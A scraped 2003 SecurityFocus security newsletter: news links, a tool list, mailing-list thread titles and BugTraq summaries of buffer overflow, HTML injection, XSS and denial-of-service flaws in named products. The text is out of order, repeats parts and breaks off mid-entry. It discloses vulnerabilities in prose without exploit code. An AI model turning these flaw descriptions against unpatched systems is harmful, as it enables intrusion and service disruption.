http://www.securityfocus.com/news/6580
4. Yaha usurps Klez
By John Leyden, The Register
Yaha-E displaced Klez as the most common viral menace on the Internet over
the last month, according to Messagelabs.
http://www.securityfocus.com/news/6579
IV. SECURITYFOCUS TOP 6 TOOLS
-----------------------------
1. PeerProtect v0.2
by Poulet Fabrice
Relevant URL:
http://www.atout.be/
Platforms: Linux, POSIX
Summary:
PeerProtect is an addon for Jay's firewall that generates a file which
contains all IP addresses from the RIAA and MPAA, etc. and will protect
peer-to-peer programs from them.
2. DSPAM v2.6.3
by Jonathan A. Zdziarski
Relevant URL:
http://www.networkdweebs.com/software/dspam/
Platforms: UNIX
Summary:
DSPAM is a server-side anti-spam agent for UNIX email servers. It
masquerades as the email server's local delivery agent and filters/learns
SPAM using a Bayesian statistical approach which provides an
administratively maintenance-free, self-learning Anti-Spam service. Each
email is broken down into its most interesting tokens, each assigned a
spam probability. All probabilities are then combined to produce a
statistical probability of spam. This approach, applied to a mature corpus
of email, has the potential to yield a 99.5% success rate with only 0.03%
chance of false positives.
3. pkdump v0.96.2
by dsmoker
Relevant URL:
http://pkdump.sourceforge.net/pkdumpage.html
Platforms: Linux, POSIX
Summary:
pkdump detects TCP and UDP port scans and connection attempt from foreign
hosts over the Internet.
4. Dante v1.1.14
by Inferno Nettverk A/S, info (at) inet (dot) no [email concealed]
Relevant URL:
http://www.inet.no/dante/
Platforms: Digital UNIX/Alpha, IRIX, Linux, OpenBSD, Solaris, SunOS
Summary:
Dante is a free implementation of the proxy protocols socks version 4,
socks version 5 (rfc1928), and msproxy. It can be used as a firewall
between networks. The package consists of two parts, a socks server and a
proxy client which supports socks, msproxy, and HTTP proxies. Commercial
support is available.
5. System Rescue CD v0.2.0
by François Dupoux
Relevant URL:
http://systemrescuecd.sourceforge.net/
Platforms: Linux
Summary:
SystemRescueCd is a Linux system available from a bootable CDROM that
provides an easy way to perform administrative tasks on your computer,
such as creating and editing the partitions of the hard disk or backing up
data. It contains a lot of system utilities (such as parted, qtparted,
partimage, and fstools) and basic utilities (such as editors, midnight
commander, and network tools).
6. FSlint v2.0.2
by pixelbeat
Relevant URL:
http://www.iol.ie/~padraiga/fslint/
Platforms: POSIX, UNIX
Summary:
FSlint is a toolkit to find various forms of lint on a filesystem. At the
moment it reports duplicate files, bad symbolic links, troublesome file
names, empty directories, non stripped executables, temporary files,
duplicate/conflicting (binary) names, and unused ext2 directory blocks.
V. SECURITY JOBS SUMMARY
------------------------
1. Systems Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331403
2. Looking for a Software Developer or Researcher Position (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331400
3. Technical Operations Manager vacancy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331405
4. Two security positions, one in PA and one in DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331392
5. Network Security Engineer relocating to PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331402
6. Security Engineer position - Montgomery, AL (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331409
7. Question about opportunities for Americans outside the US (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331395
8. Installation & Support Technician (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331397
9. Ethical Hacker Needed -- Chicago (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331393
10. Security Software Sales opportunity- Federal (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331398
11. Security Software Sales opportunities- Midwest, Southeast/west (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331394
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331396
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331406
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331401
15. IA Program Manger (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331408
16. Full time IT Auditor position in Pittsburgh PA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331404
17. Seeking Information Security Position in the Washington, DC Metro Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331407
18. Seattle - Security Sales (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/331399
19. Google: Network Security Engineer (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330989
20. Fulltime Test positions -Northern Va (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330992
21. Symantec's MSS practice looking for security device expert - Alexandria, VA
(Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330988
22. Senior Security Professional seeking post (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330991
23. Senior Security Analyst Opportunity - Alphatech Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330983
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330990
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330984
26. Senior IT Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330982
27. System Security Analyst (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330997
28. IT Security Auditor (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330981
29. Top Secret Cleared Security Professionals Wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330985
30. Open Positions at LURHQ Corporation (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330980
31. Seeking Information Security Position in the SF Bay Area (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330978
32. Network Security Engineer - Washington, DC (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330977
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330976
34. Security Software Developer available (Thread)
Relevant URL:
http://www.securityfocus.com/archive/77/330975
VI. INCIDENTS LIST SUMMARY
-------------------------
1. Command Line RPC vulnerability scanner? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331427
2. Scan of TCP 552-554 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331331
3. RPC DCOM exploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331327
4. Scans for 17300/tcp starting again (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331293
5. Exploit for Windows RPC may be in the wild! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331226
6. new worm? or DDoS attack in progress (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331221
7. Importance of outbound traffic filtering (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331222
8. floods through our proxy (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/331008
9. Anyone know this tool? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330901
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330715
11. www.google.com reference in directory-traversal attack (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330707
12. New or old PHP worm? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330693
13. Is this enough to identify this by? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330692
14. "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330760
15. First time security issue. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330688
16. [security-elvandar] "access_log?hello" ? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330691
17. Heavy port 1214 traffic revisited (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330610
18. First Time Security Incident (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330612
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330607
20. New worm in Japan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330606
21. Port 0 packets (Thread)
Relevant URL:
http://www.securityfocus.com/archive/75/330609
VII. VULN-DEV RESEARCH LIST SUMMARY
----------------------------------
1. Analyze binary for holes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331364
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331362
3. Password Cracking Challenge... (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331319
4. perl/php connect-back backdoor? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331107
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331106
6. is it even possible for a worm with dcom vuln? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331103
7. Some help With BOF Exploits Writing. (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/331099
8. proces on win2K (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330711
9. Thanks much! (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330433
10. Unbreakable Lotus Notes (Thread)
Relevant URL:
http://www.securityfocus.com/archive/82/330434
VIII. MICROSOFT FOCUS LIST SUMMARY
---------------------------------
1. DCOM RPC exploit as a virus/trojan? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331422
2. change NT passwords Kerberos (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331421
3. How to silently deploy DirectX9b? (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331419
4. Windows XP "write attributes" permission for Users (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331275
5. IAS as a RADIUS server (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331114
6. HTASploit (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/331021
7. ISA Server and Win2k3 standard OS (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330884
8. SecurityFocus Microsoft Newsletter #147 (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330740
9. monitor folders (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330728
10. Tracking down a user in a large AD network (Thread)
Relevant URL:
http://www.securityfocus.com/archive/88/330724
IX. SUN FOCUS LIST SUMMARY
----------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
---------------------------
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
-----------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
SecurityFocus Newsletter #208
-----------------------------
This Issue is Sponsored by: SPI Dynamics
NEW ALERT:
"How a Hacker Launches a LDAP Injection Attack Step-by-Step"
It's as simple as placing additional LDAP query commands
into a Web form input box giving hackers complete access
to all your backend systems! Firewalls and IDS will not
stop such attacks because LDAP Injections are seen as valid
data.
Download this *FREE* white paper from SPI Dynamics for a
complete guide to protection!
http://www.securityfocus.com/SPIDynamics-sf-news5
------------------------------------------------------------------------
--
I. FRONT AND CENTER
1. Maintaining System Integrity During Forensics
2. Firewall Evolution - Deep Packet Inspection
3. Betting on Malware
II. BUGTRAQ SUMMARY
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
2. Microsoft Outlook Express Script Execution Weakness
3. e107 Website System HTML Injection Vulnerability
4. ManDB Utility Local Buffer Overflow Vulnerability
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
6. University of Minnesota GopherD Do_Command Buffer Overflow...
7. PBLang Bulletin Board System HTML Injection Vulnerability
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service...
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
12. Gallery Search Engine Cross-Site Scripting Vulnerability
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
14. MacOS X Third Party Application Screen Effects Password...
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
18. Mini SQL Remote Format String Vulnerability
19. XBlast HOME Environment Variable Buffer Overflow Vulnerability
20. KDE Konqueror HTTP REFERER Authentication Credential Leak...
21. Valve Software Half-Life Client Connection Routine Buffer...
22. Valve Software Half-Life Dedicated Server Malformed Parameter...
23. Valve Software Half-Life Dedicated Server Multiplayer Request...
24. Linux Kernel 2.4 XDR Packet Handler For NFSv3 Remote Denial Of...
25. NetScreen ScreenOS TCP Window Size Remote Denial Of Service...
26. Multiple ManDB Utility Local Buffer Overflow Vulnerabilities
27. Sun Solaris Runtime Linker LD_PRELOAD Local Buffer Overflow...
28. SGI IRIX NSD AUTH_UNIX GID List Privilege Escalation...
29. Symantec Quarantine Server Disconnect Denial Of Service...
30. XConq Multiple Environment Variable Buffer Overflow...
III. SECURITYFOCUS NEWS ARTICLES
1. Fed: Cyberterror fears missed real threat
2. Panel Probes the Half-life of Bugs
3. UK e-voting pilots deeply flawed
4. Yaha usurps Klez
IV. SECURITYFOCUS TOP 6 TOOLS
1. PeerProtect v0.2
2. DSPAM v2.6.3
3. pkdump v0.96.2
4. Dante v1.1.14
5. System Rescue CD v0.2.0
6. FSlint v2.0.2
V. SECURITYJOBS LIST SUMMARY
1. Systems Security Engineer (Thread)
2. Looking for a Software Developer or Researcher Position (Thread)
3. Technical Operations Manager vacancy (Thread)
4. Two security positions, one in PA and one in DC (Thread)
5. Network Security Engineer relocating to PA (Thread)
6. Security Engineer position - Montgomery, AL (Thread)
7. Question about opportunities for Americans outside the US (Thread)
8. Installation & Support Technician (Thread)
9. Ethical Hacker Needed -- Chicago (Thread)
10. Security Software Sales opportunity- Federal (Thread)
11. Security Software Sales opportunities- Midwest, Southeast/west...
12. Information Security Architect - Franklin Lakes, NJ, USA (Thread)
13. Cisco is looking for a Sr. Microsoft security expert (Thread)
14. Sr. IA Engineer to work on program in Wash., DC (Thread)
15. IA Program Manger (Thread)
16. Full time IT Auditor position in Pittsburgh PA (Thread)
17. Seeking Information Security Position in the Washington, DC...
18. Seattle - Security Sales (Thread)
19. Google: Network Security Engineer (Thread)
20. Fulltime Test positions -Northern Va (Thread)
21. Symantec's MSS practice looking for security device expert...
22. Senior Security Professional seeking post (Thread)
23. Senior Security Analyst Opportunity - Alphatech Corporation...
24. IMMEDIATE OPENING - Vulnerability Assessment, Reston, VA (Thread)
25. IMMEDIATE OPENING - Sr. IDS Manager, Bethesda, MD (Thread)
26. Senior IT Auditor (Thread)
27. System Security Analyst (Thread)
28. IT Security Auditor (Thread)
29. Top Secret Cleared Security Professionals Wanted (Thread)
30. Open Positions at LURHQ Corporation (Thread)
31. Seeking Information Security Position in the SF Bay Area (Thread)
32. Network Security Engineer - Washington, DC (Thread)
33. Axexandria, VA - Sr Mgmt Systems Programmer wanted (Thread)
34. Security Software Developer available (Thread)
VI. INCIDENTS LIST SUMMARY
1. Command Line RPC vulnerability scanner? (Thread)
2. Scan of TCP 552-554 (Thread)
3. RPC DCOM exploit (Thread)
4. Scans for 17300/tcp starting again (Thread)
5. Exploit for Windows RPC may be in the wild! (Thread)
6. new worm? or DDoS attack in progress (Thread)
7. Importance of outbound traffic filtering (Thread)
8. floods through our proxy (Thread)
9. Anyone know this tool? (Thread)
10. email worm? Newsletter, aaa.exe, caraoke ksp.exe (Thread)
11. www.google.com reference in directory-traversal attack (Thread)
12. New or old PHP worm? (Thread)
13. Is this enough to identify this by? (Thread)
14. "access_log?hello" ? (Thread)
15. First time security issue. (Thread)
16. [security-elvandar] "access_log?hello" ? (Thread)
17. Heavy port 1214 traffic revisited (Thread)
18. First Time Security Incident (Thread)
19. email worm? Newsletter, aaa.exe, caraoke ksp.exe (fwd) (Thread)
20. New worm in Japan? (Thread)
21. Port 0 packets (Thread)
VII. VULN-DEV RESEARCH LIST SUMMARY
1. Analyze binary for holes (Thread)
2. Some help With BOF Exploits Writing. - EAX ?! (Thread)
3. Password Cracking Challenge... (Thread)
4. perl/php connect-back backdoor? (Thread)
5. VL: Remote Linux Kernel < 2.4.21 DoS in XDR routine. (Thread)
6. is it even possible for a worm with dcom vuln? (Thread)
7. Some help With BOF Exploits Writing. (Thread)
8. proces on win2K (Thread)
9. Thanks much! (Thread)
10. Unbreakable Lotus Notes (Thread)
VIII. MICROSOFT FOCUS LIST SUMMARY
1. DCOM RPC exploit as a virus/trojan? (Thread)
2. change NT passwords Kerberos (Thread)
3. How to silently deploy DirectX9b? (Thread)
4. Windows XP "write attributes" permission for Users (Thread)
5. IAS as a RADIUS server (Thread)
6. HTASploit (Thread)
7. ISA Server and Win2k3 standard OS (Thread)
8. SecurityFocus Microsoft Newsletter #147 (Thread)
9. monitor folders (Thread)
10. Tracking down a user in a large AD network (Thread)
IX. SUN FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
X. LINUX FOCUS LIST SUMMARY
1. NO NEW POSTS FOR THE WEEK ENDING 08.01.03
XI. SPONSOR INFORMATION
I. FRONT AND CENTER
-------------------
1. Betting on Malware
By George Smith
DARPA's plan to create a futures market for terrorist activities is dead, but the
concept is a natural for predicting viruses and worms.
http://www.securityfocus.com/columnists/176
2. Maintaining System Integrity During Forensics
By Jamie Morris
This article discusses best practices for maintaining system integrity
during forensic examinations.
http://www.securityfocus.com/infocus/1717
3. Firewall Evolution - Deep Packet Inspection
By Ido Dubrawsky
Deep Packet Inspection can be seen as the integration of Intrusion
Detection (IDS) and Intrusion Prevention (IPS) capabilities with
traditional stateful firewall technology.
http://www.securityfocus.com/infocus/1716
II. BUGTRAQ SUMMARY
-------------------
1. Multiple Novell iChain Buffer Overflow Vulnerabilities
BugTraq ID: 8280
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8280
Summary:
Novell iChain Server is a web-based security product designed to implement
and maintain various network-based access controls.
Novell iChain has been reported prone to multiple buffer overflow
vulnerabilities.
The first issue occurs when a special script is run against login. The
issue is likely due to insufficient bounds checking performed on
user-supplied data. It is reported that this issue may be exploited to
trigger a server ABEND condition.
The second issue occurs when a user login name >= 230 bytes is passed to
the iChain server. It has been reported that if this login fails and email
alerts is enabled in the iChain server, the excessive data will likely
trigger an ABEND condition in the affected software.
It has been reported that both of these conditions may be exploited to
trigger ABEND conditions and deny service to legitimate users.
This BID will be updated as further technical details are disclosed.
2. Microsoft Outlook Express Script Execution Weakness
BugTraq ID: 8281
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8281
Summary:
It has been reported that a weakness may have been re-introduced into
Microsoft Outlook Express. According to the source, the issue described
in Bugtraq ID 3334 had been fixed by Microsoft but appears to have
resurfaced.
The original report (BID 3334) described behavior where script code
included in a message set as type "text/plain" in its content-type header
field would be parsed and executed. A reliable source has indicated that
this condition appears to have returned after being fixed.
This is unsafe behavior as the client should treat all messages of this
type as plain text and not execute any script or render any HTML.
Furthermore, these messages may bypass filters designed to block messages
that contain HTML/script code based on the content-type field.
It should be noted that Symantec has no record of the original issue being
fixed. This record will be updated as more information becomes available.
3. e107 Website System HTML Injection Vulnerability
BugTraq ID: 8279
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8279
Summary:
e107 Website System is a web based content management system implemented
in PHP.
The e107 Website System is prone to an HTML injection vulnerability. This
issue is exposed through the class2.php script. An attacker may exploit
this issue by including hostile HTML and script code in form fields that
support custom tags. This includes areas of the site such as Chatbox and
Forum. This code may be rendered in the web browser of a user who views
these areas of the site. This would occur in the security context of the
site hosting e107.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
4. ManDB Utility Local Buffer Overflow Vulnerability
BugTraq ID: 8278
Remote: No
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8278
Summary:
mandb is a utility that is used to initialize or manually update the index
database caches that are usually maintained by the man utility.
mandb has been reported prone to a local buffer overflow vulnerability.
It has been reported that a local attacker may exploit this issue to
execute arbitrary instructions with elevated privileges. Specifically,
user 'man' privileges.
The issue likely presents itself due to a lack of sufficient bounds
checking performed on user-supplied data. Although unconfirmed, it has
been conjectured that user supplied data copied into an insufficient
reserved memory buffer may overflow the bounds of that buffer and corrupt
saved values that are crucial to program execution flow control.
The attacker may exploit this issue to influence execution flow of the
vulnerable utility and have arbitrary attacker specified instructions
executed inline.
It should be noted that although the mandb utility is installed with
setuid root privileges by default, this issue has been reported to be only
exploitable to attain user 'man' privileges.
Additionally, although this vulnerability has been reported to affect man
version 2.3.19, other version may also be affected.
5. FreeRadius Chap Remote Buffer Overflow Vulnerability
BugTraq ID: 8282
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8282
Summary:
FreeRADIUS is a freely available, open source implementation of the RADIUS
protocol. It is available for the Unix and Linux operating systems.
A problem with FreeRADIUS has been reported when handling CHAP requests.
Because of this, an attacker may be able to gain unauthorized access to a
system using the vulnerable software.
Specific details about the vulnerability are not currently available. It
is known that the problem in CHAP may be exploited to execute code with
the privileges of the FreeRADIUS server. This could give the attacker
access to the system with the privileges of the FreeRADIUS server.
6. University of Minnesota GopherD Do_Command Buffer Overflow Vulnerability
BugTraq ID: 8283
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8283
Summary:
gopherd is the implementation of the Gopher Protocol Daemon by the
University of Minnesota. It is available for the Unix and Linux platforms.
It has been reported that University of Minnesota gopherd is vulnerable to
a remotely exploitable boundary condition error. This may make it possible
for an attacker to gain unauthorized access to a host using the vulnerable
software.
The problem is in the do_command function of the Gopherd.c file. Due to
insufficient bounds checking on the user-supplied data, it is possible for
an attacker to overwrite sensitive process memory. This could result in
the execution of arbitrary instructions with the privileges of the gopher
daemon process.
7. PBLang Bulletin Board System HTML Injection Vulnerability
BugTraq ID: 8284
Remote: Yes
Date Published: Jul 25 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8284
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code in posts to the bulletin board.
This is because the script that processes posts does not sufficiently
sanitize user input, allowing attackers to embed HTML and script commands
within the post. This code may be rendered in the web browser of a user
who views these areas of the site. This would occur in the security
context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
8. EFSoftware EF Commander FTP Banner Buffer Overflow Vulnerability
BugTraq ID: 8285
Remote: Yes
Date Published: Jul 26 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8285
Summary:
EF Commander is a commercially available FTP client distributed by
EFSoftware. It is available for the Microsoft Windows platform.
A problem with EF Commander could result in the execution of arbitrary
code.
It has been reported that a memory corruption bug exists in EF Commander.
Under some circumstances, when an FTP client connects to a malicious FTP
server it may be possible for the server to exploit a boundary condition
error.
The problem is in the handling of FTP banners in EF Commander. When EF
Commander receives a FTP banner of excessive length, it becomes unstable.
It has been reported that this vulnerability can be reproduced by sending
an FTP banner of 520 or more bytes to a vulnerable client. It is possible
that this vulnerability is an exploitable buffer overflow, and could
result in the execution of attacker-supplied code. Any code executed would
be with the permissions of the EF Commander client user.
9. PBLang Bulletin Board System IMG Tag HTML Injection Vulnerability
BugTraq ID: 8286
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8286
Summary:
PBLang is a bulletin board system implemented in PHP.
PBLang is prone to an HTML injection vulnerability. This issue is exposed
through the docs.php script. An attacker may exploit this issue by
including hostile HTML and script code encapsulated in [IMG] tags of posts
to the bulletin board. This is because the script that processes posts
does not sufficiently sanitize user input, allowing attackers to embed
HTML and script commands within [IMG] tags of the post. This code may be
rendered in the web browser of a user who views these areas of the site.
This would occur in the security context of the site hosting PBLang.
The attacker-supplied HTML and script code would be able to access
properties of the site, potentially allowing for theft of cookie-based
authentication credentials. An attacker could also exploit this issue to
control how the site is rendered to the user.
It should be noted that although this vulnerability has been reported to
affect PBLang version 4.56, previous versions are also likely affected.
10. Cisco Aironet AP1x00 Malformed HTTP GET Denial Of Service Vulnerability
BugTraq ID: 8290
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8290
Summary:
The Cisco Aironet AP1x00 is a series of wireless access point devices.
Cisco Aironet AP1x00 series devices are prone to a denial of service
vulnerability upon receipt of a malformed HTTP GET request. This issue
exists in the web administrative interface for affected devices. Such a
request will cause the device to reload. It is possible to cause a
prolonged denial of service by repeatedly sending such requests to an
affected device. This could be exploited to deny availability of a WLAN
that depends on the device.
11. Cisco Aironet Telnet Service User Account Enumeration Weakness
BugTraq ID: 8292
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8292
Summary:
Aironet is the Wireless Access Point solution distributed and maintained
by Cisco.
An information leak has been reported in Cisco Aironet Access Points when
the telnet service has been enabled. This may allow a remote attacker to
gain potentially sensitive information.
The problem is in the response of the telnet daemon. Usual implementation
returns a response to a failed authentication attempt that does not
validate the user name. However, when an invalid username is sent to the
Aironet telnet daemon, the daemon responds with a "% Login invalid"
message, allowing the attacker to gather a list of valid user names on the
target device.
12. Gallery Search Engine Cross-Site Scripting Vulnerability
BugTraq ID: 8288
Remote: Yes
Date Published: Jul 27 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8288
Summary:
Gallery is a web-based photo album. It is written in PHP and is available
for Linux and Unix variants as well as Microsoft Windows operating
systems.
Gallery is prone to a cross-site scripting vulnerability. This issue is
present in the search engine (search.php) facility provided by the
software. Input supplied to the search engine via URI parameters is not
sufficiently sanitized of HTML or script code before being echoed back to
users, allowing for cross-site scripting attacks.
An attacker could exploit this issue by constructing a malicious link to
the search engine that contains hostile HTML and script code.
Attacker-supplied code could be rendered in the browser of a user who
follows such a link. This would occur in the security context of the site
hosting the vulnerable software.
13. Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
BugTraq ID: 8287
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8287
Summary:
mod_mylo is a third party module for Apache HTTP server. The module is
designed to log data into a MySQL database in addition to standard
logging.
mod_mylo has been reported prone to remotely exploitable buffer overflow
vulnerability.
The issue presents itself due to insufficient bounds checking performed on
HTTP requests before the HTTP request string is copied into a buffer in
memory. Data excessive to the size of the buffer will corrupt adjacent
memory. Because memory adjacent to this buffer has been reported to store
a saved instruction pointer, it is possible for a remote attacker to
influence program execution flow. Ultimately a remote attacker may exploit
this condition to execute arbitrary instructions in the context of the
Apache HTTP server.
This issue has been reported to affect mod_mylo version 0.2.1 and all
versions prior.
14. MacOS X Third Party Application Screen Effects Password Protection Bypass
Vulnerability
BugTraq ID: 8293
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8293
Summary:
Apple MacOS X has a screen saver, entitled Screen Effects, with a password
feature.
Screen Effects has been reported prone to a vulnerability where third
party applications may allow a user who has physical access to the host,
to kill the Screen Effects process and thereby subvert desktop password
protection.
Under certain circumstances, this may allow an attacker to gain
unauthorized access to a vulnerable host.
15. HP PHNE_27128 Denial Of Service Introduction Vulnerability
BugTraq ID: 8291
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8291
Summary:
HP PHNE_27128 is a cumulative patch released by HP to address non-critical
issues in nettl and nettladm.
It has been reported that the PHNE_27128 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could exploited by a non-privileged user to trigger a system
panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
16. HP PHNE_26413 Denial Of Service Introduction Vulnerability
BugTraq ID: 8289
Remote: No
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8289
Summary:
HP PHNE_26413 is a patch released by HP to address non-critical issues in
nettl, netfmt and nettladm.
It has been reported that the PHNE_26413 patch has introduced a potential
local denial of service vulnerability. HP has announced that this
vulnerability could exploited by a non-privileged user to trigger a system
panic on a target system.
This BID will be updated as further technical details regarding this
vulnerability are disclosed.
17. Softshoe Parse-file Cross-Site Scripting Vulnerability
BugTraq ID: 8294
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8294
Summary:
Softshoe is a human resources application.
Softshoe is allegedly prone to cross-site scripting attacks. The issue
exists in the 'parse_file' component and may be exploited by including
HTML and script code as input to the 'TEMPLATE' URI parameter. An
attacker can exploit this issue by creating a malicious link that contains
hostile HTML or script code to a site that is hosting the vulnerable
software. If such a link is visited, the attacker-supplied code may be
rendered in the user's web browser. This would occur in the context of
the site hosting the software.
Exploitation of this issue could allow for theft of cookie-based
authentication credentials or other attacks.
18. Mini SQL Remote Format String Vulnerability
BugTraq ID: 8295
Remote: Yes
Date Published: Jul 28 2003 12:00AM
Relevant URL:
http://www.securityfocus.com/bid/8295
Summary:
